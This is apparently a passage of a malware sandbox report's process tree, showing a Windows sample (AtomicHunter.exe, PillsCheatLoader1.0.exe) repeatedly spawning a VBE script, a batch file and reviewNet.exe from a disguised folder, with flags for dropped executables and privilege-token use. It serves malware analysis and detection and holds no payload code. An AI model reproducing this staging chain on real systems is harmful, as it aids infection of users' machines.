C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "52⤵PID:5860
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"53⤵PID:3492
-
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"50⤵PID:6232
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"49⤵PID:7056
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"50⤵PID:6152
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "51⤵PID:5000
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"52⤵PID:7008
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"48⤵PID:7008
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"49⤵PID:7156
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "50⤵PID:5152
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"51⤵PID:6524
-
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"48⤵PID:5096
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"47⤵PID:6764
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"48⤵PID:6844
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "49⤵PID:6816
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"50⤵PID:4124
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"46⤵PID:6688
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"47⤵PID:6852
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "48⤵PID:6496
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"49⤵PID:6504
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"45⤵PID:6564
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"46⤵PID:6656
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "47⤵PID:3620
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"48⤵PID:4700
-
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"45⤵PID:5536
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"44⤵PID:6472
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"45⤵PID:6612
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "46⤵PID:5848
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"47⤵PID:3768
-
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"44⤵PID:4520
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"43⤵PID:6416
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"44⤵PID:6504
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "45⤵PID:3708
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"46⤵PID:5016
-
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"43⤵PID:7668
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"42⤵PID:6380
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"43⤵PID:6520
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "44⤵PID:3252
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"45⤵PID:4052
-
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"42⤵PID:3932
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"41⤵PID:6236
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"42⤵PID:6324
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "43⤵PID:6416
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"44⤵PID:3404
-
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"41⤵PID:7672
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"40⤵PID:4776
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"41⤵PID:4260
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "42⤵PID:3124
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"43⤵PID:6840 (Suspicious use of AdjustPrivilegeToken)
-
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"40⤵PID:5904
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"39⤵PID:6000
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"40⤵PID:3792
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "41⤵PID:4728
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"42⤵PID:6772 (Suspicious use of AdjustPrivilegeToken)
-
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"39⤵PID:5816
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"38⤵PID:4388
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"37⤵PID:4772
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"38⤵PID:5800
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "39⤵PID:7016
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"40⤵
- Suspicious use of AdjustPrivilegeToken
PID:5628
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"36⤵PID:4404
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"37⤵PID:5792
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "38⤵PID:7096
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"39⤵
- Suspicious use of AdjustPrivilegeToken
PID:2568
-
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"36⤵PID:5492
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"35⤵PID:3336
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"36⤵PID:4212
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "37⤵PID:5300
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"38⤵
- Suspicious use of AdjustPrivilegeToken
PID:3444
-
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"35⤵PID:6340
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"34⤵PID:3584
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"35⤵PID:2164
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "36⤵PID:3516
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"37⤵
- Suspicious use of AdjustPrivilegeToken
PID:5436
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"33⤵PID:2196
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"34⤵PID:3808
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "35⤵PID:2300
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"36⤵
- Suspicious use of AdjustPrivilegeToken
PID:5408
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"32⤵PID:1980
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"33⤵PID:2288
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "34⤵PID:5968
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"35⤵
- Suspicious use of AdjustPrivilegeToken
PID:4340
-
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"32⤵PID:2892
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"31⤵PID:3588
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"32⤵PID:3716
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "33⤵PID:4720
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"34⤵
- Suspicious use of AdjustPrivilegeToken
PID:5048
-
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"31⤵PID:6268
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"30⤵PID:3528
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"31⤵PID:3680
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "32⤵PID:4704
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"33⤵
- Suspicious use of AdjustPrivilegeToken
PID:5060
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"29⤵PID:3440
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"30⤵PID:3496
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "31⤵PID:4676
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"32⤵
- Suspicious use of AdjustPrivilegeToken
PID:5012
-
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"29⤵PID:7744
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"28⤵
- Executes dropped EXE
PID:3408
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"29⤵PID:3508
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "30⤵PID:4728
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"31⤵
- Suspicious use of AdjustPrivilegeToken
PID:5004
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"27⤵
- Executes dropped EXE
PID:3276
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"28⤵PID:3372
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "29⤵PID:4696
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"30⤵
- Suspicious use of AdjustPrivilegeToken
PID:5040
-
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"27⤵PID:6700
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"26⤵
- Executes dropped EXE
PID:3236
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"27⤵PID:3400
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "28⤵PID:4684
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"29⤵
- Suspicious use of AdjustPrivilegeToken
PID:5020
-
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"26⤵PID:7684
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"25⤵
- Executes dropped EXE
PID:536
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"26⤵PID:3252
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "27⤵PID:4712
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"28⤵
- Suspicious use of AdjustPrivilegeToken
PID:5028
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"24⤵
- Executes dropped EXE
PID:2152
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"25⤵PID:2000
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "26⤵PID:3236
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"27⤵
- Suspicious use of AdjustPrivilegeToken
PID:2332
-
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"24⤵PID:5912
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"23⤵
- Executes dropped EXE
PID:348
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"24⤵PID:2360
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "25⤵PID:3676
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"26⤵
- Suspicious use of AdjustPrivilegeToken
PID:3484
-
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"23⤵PID:7624
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"22⤵
- Executes dropped EXE
PID:1028
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"23⤵PID:1696
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "24⤵PID:3576
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"25⤵
- Suspicious use of AdjustPrivilegeToken
PID:3352
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"21⤵
- Executes dropped EXE
PID:2068
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"22⤵PID:1988
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "23⤵PID:1724
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"24⤵
- Suspicious use of AdjustPrivilegeToken
PID:3348
-
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"21⤵PID:2540
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"20⤵
- Executes dropped EXE
PID:2484
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"21⤵PID:2520
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "22⤵PID:3868
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"23⤵
- Suspicious use of AdjustPrivilegeToken
PID:2216
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"19⤵
- Executes dropped EXE
PID:1960
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"20⤵PID:2780
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "21⤵PID:3876
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"22⤵
- Suspicious use of AdjustPrivilegeToken
PID:2028
-
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"19⤵PID:7700
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"18⤵
- Executes dropped EXE
PID:2224
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"19⤵PID:1588
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "20⤵PID:3768
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"21⤵
- Suspicious use of AdjustPrivilegeToken
PID:3360
-
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"18⤵PID:4844
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"17⤵
- Executes dropped EXE
PID:1804
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"18⤵PID:3032
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "19⤵PID:3700
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"20⤵
- Suspicious use of AdjustPrivilegeToken
PID:2000
-
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"17⤵PID:7836
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"16⤵
- Executes dropped EXE
PID:1696
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"17⤵PID:1584
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "18⤵PID:3812
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"19⤵
- Suspicious use of AdjustPrivilegeToken
PID:4012
-
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"16⤵PID:6564
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"15⤵
- Executes dropped EXE
PID:1508
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"16⤵PID:3024
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "17⤵PID:3660
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"18⤵
- Suspicious use of AdjustPrivilegeToken
PID:1636
-
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"15⤵PID:5844
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"14⤵
- Executes dropped EXE
PID:1812
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"15⤵PID:1564
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "16⤵PID:3616
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"17⤵
- Suspicious use of AdjustPrivilegeToken
PID:1492
-
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"14⤵PID:3460
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"13⤵
- Executes dropped EXE
PID:1348
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"14⤵PID:2132
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "15⤵PID:3856
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"16⤵
- Suspicious use of AdjustPrivilegeToken
PID:3672
-
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"13⤵PID:6616
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"12⤵
- Executes dropped EXE
PID:2312
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"13⤵PID:3000
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "14⤵
- Loads dropped DLL
PID:2612
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"15⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1560
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"11⤵
- Executes dropped EXE
PID:2024
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"12⤵PID:2908
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "13⤵PID:3632
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"14⤵
- Suspicious use of AdjustPrivilegeToken
PID:2200
-
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"11⤵PID:4700
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"10⤵
- Executes dropped EXE
PID:1856
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"11⤵PID:408
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "12⤵
- Loads dropped DLL
PID:1984
-
